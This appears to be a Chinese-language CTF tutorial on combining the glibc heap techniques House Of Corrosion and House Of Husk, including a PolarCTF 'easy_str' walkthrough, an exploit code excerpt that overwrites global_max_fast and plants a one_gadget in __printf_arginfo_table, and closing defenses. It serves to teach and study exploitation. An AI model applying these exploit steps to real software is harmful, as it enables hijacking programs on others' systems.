House Of Corrosion与House Of Husk交叉利用技术详解<\/h1>

一、House Of Corrosion攻击技术<\/h2>

1. 基本原理<\/h3>
House Of Corrosion是一种通过攻击main_arena<\/code>结构体中的fastbinY<\/code>数组来实现利用的攻击技术。<\/p>
main_arena<\/code>结构体关键部分：<\/p>
struct<\/span> malloc_state {
<\/span><\/span>    int<\/span> mutex;
<\/span><\/span>    int<\/span> flags;
<\/span><\/span>    int<\/span> have_fastchunks;
<\/span><\/span>    mfastbinptr fastbinsY[NFASTBINS];  \/\/ 通常有10个fastbin
<\/span><\/span><\/span><\/span>    \/\/ ...其他字段...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>2. 攻击核心机制<\/h3>

fastbinY<\/code>数组基于&main_arena.fastbinsY<\/code>的值进行偏移<\/li>
通过数组溢出可以写到main_arena<\/code>下方的位置<\/li>
计算目标地址对应chunk大小的公式：
size = (target_addr - top) * 2 - 0x10
<\/code><\/pre>
<\/li>
<\/ul>
3. 攻击前提条件<\/h3>
需要让大小大于上限(0xb0)的chunk进入fastbin，通常通过以下方式修改global_max_fast<\/code>：<\/p>

unsorted bin attack - 把main_arena附近的内容写进去<\/li>
large_bin attack - 写一个堆地址进去<\/li>
其他攻击方式<\/li>
<\/ol>
4. 攻击流程示例<\/h3>
以2.27版本为例的攻击步骤：<\/p>

分配一个大小合适的chunk（根据目标地址与main_arena.fastbinsY<\/code>的距离计算）<\/li>
泄露libc地址<\/li>
利用unsorted bin attack修改global_max_fast<\/code><\/li>
释放大chunk，使其地址写入目标位置<\/li>
<\/ol>
二、House Of Husk攻击技术<\/h2>
1. 基本原理<\/h3>
House Of Husk主要针对printf函数及其内部调用的函数指针：<\/p>

__printf_arginfo_table<\/code><\/li>
__printf_function_table<\/code><\/li>
<\/ul>
2. 攻击目标选择<\/h3>
优先选择攻击__printf_arginfo_table<\/code>，因为：<\/p>

只需要控制一个内容<\/li>
printf_functions_table<\/code>需要控制两个内容<\/li>
<\/ul>
3. printf调用链分析<\/h3>
printf 
  -> vprintf 
    -> do_positional 
      -> printf_positional 
        -> __parse_one_specmb
<\/code><\/pre>
关键检查点：<\/p>
if<\/span> (__glibc_unlikely(__printf_function_table !=<\/span> NULL ||<\/span> 
<\/span><\/span>                    __printf_modifier_table !=<\/span> NULL ||<\/span> 
<\/span><\/span>                    __printf_va_arg_table !=<\/span> NULL))
<\/span><\/span>    goto<\/span> do_positional;
<\/span><\/span><\/code><\/pre>4. 关键数据结构<\/h3>
__register_printf_specifier<\/code>函数注册自定义格式化字符：<\/p>
int<\/span> __register_printf_specifier<\/span>(int<\/span> spec, 
<\/span><\/span>                              printf_function converter,
<\/span><\/span>                              printf_arginfo_size_function arginfo) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    __printf_function_table[spec] =<\/span> converter;
<\/span><\/span>    __printf_arginfo_table[spec] =<\/span> arginfo;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、交叉利用技术实战<\/h2>
1. 例题分析（PolarCTF easy_str）<\/h3>
程序特点：<\/p>

只能申请5个chunk<\/li>
chunk大小必须≥0x500<\/li>
程序中使用了自定义格式化字符%X<\/code><\/li>
<\/ul>
2. 攻击步骤<\/h3>


泄露libc地址<\/strong>：<\/p>

分配并释放一个大chunk，通过UAF泄露libc地址<\/li>
<\/ul>
<\/li>

House Of Corrosion准备<\/strong>：<\/p>

计算printf_arginfo_table<\/code>和printf_function_table<\/code>与main_arena的偏移<\/li>
分配对应大小的chunk<\/li>
<\/ul>
<\/li>

修改global_max_fast<\/strong>：<\/p>

使用unsorted bin attack修改global_max_fast<\/code><\/li>
<\/ul>
<\/li>

触发House Of Corrosion<\/strong>：<\/p>

释放特定chunk，使printf_arginfo_table<\/code>指向我们控制的chunk<\/li>
<\/ul>
<\/li>

布置payload<\/strong>：<\/p>

在chunk中布置数据，使得__printf_arginfo_table[88]<\/code>（对应%X）指向one_gadget<\/li>
<\/ul>
<\/li>

绕过保护<\/strong>：<\/p>

释放另一个chunk使printf_function_table<\/code>不为0<\/li>
<\/ul>
<\/li>
<\/ol>
3. EXP关键代码解析<\/h3>
# 计算偏移<\/span>
<\/span><\/span># main_arena = printf_arginfo_table - 0xc30<\/span>
<\/span><\/span># main_arena = printf_function_table - 0x4af8<\/span>
<\/span><\/span>
<\/span><\/span># 分配特殊大小的chunk<\/span>
<\/span><\/span>add(0x4af8<\/span> *<\/span> 2<\/span> -<\/span> 0x10<\/span>)  # 对应printf_function_table<\/span>
<\/span><\/span>add(0xc30<\/span> *<\/span> 2<\/span> -<\/span> 0x10<\/span>)   # 对应printf_arginfo_table<\/span>
<\/span><\/span>
<\/span><\/span># unsorted bin attack修改global_max_fast<\/span>
<\/span><\/span>edit(0<\/span>, p64(libc_base +<\/span> 0x70<\/span> +<\/span> libc.<\/span>sym['__malloc_hook'<\/span>]) +<\/span> p64(global_max_fast -<\/span> 0x10<\/span>))
<\/span><\/span>
<\/span><\/span># 布置one_gadget<\/span>
<\/span><\/span>edit(2<\/span>, b<\/span>'abcdefgh'<\/span>*<\/span>(0x58<\/span> -<\/span> 2<\/span>) +<\/span> p64(og))  # 0x58=88，对应%X<\/span>
<\/span><\/span>
<\/span><\/span># 触发<\/span>
<\/span><\/span>dele(1<\/span>)  # 使printf_function_table不为0<\/span>
<\/span><\/span><\/code><\/pre>四、防御与检测<\/h2>


House Of Corrosion防御<\/strong>：<\/p>

检查fastbin chunk大小是否合法<\/li>
加强对global_max_fast<\/code>的保护<\/li>
<\/ul>
<\/li>

House Of Husk防御<\/strong>：<\/p>

检查格式化字符串是否合法<\/li>
保护__printf_arginfo_table<\/code>和__printf_function_table<\/code><\/li>
<\/ul>
<\/li>

通用防御<\/strong>：<\/p>

启用FORTIFY_SOURCE<\/li>
使用最新的glibc版本<\/li>
启用ASLR和PIE<\/li>
<\/ul>
<\/li>
<\/ol>
五、技术要点总结<\/h2>


House Of Corrosion关键点<\/strong>：<\/p>

精确计算目标地址对应的chunk大小<\/li>
可靠地修改global_max_fast<\/code><\/li>
理解fastbin数组的索引机制<\/li>
<\/ul>
<\/li>

House Of Husk关键点<\/strong>：<\/p>

确定自定义格式化字符的spec值<\/li>
确保printf_function_table<\/code>不为0<\/li>
精确控制__printf_arginfo_table<\/code>的内容<\/li>
<\/ul>
<\/li>

交叉利用优势<\/strong>：<\/p>

House Of Corrosion提供任意地址写能力<\/li>
House Of Husk提供稳定的控制流劫持<\/li>
两者结合可绕过更多保护机制<\/li>
<\/ul>
<\/li>
<\/ol>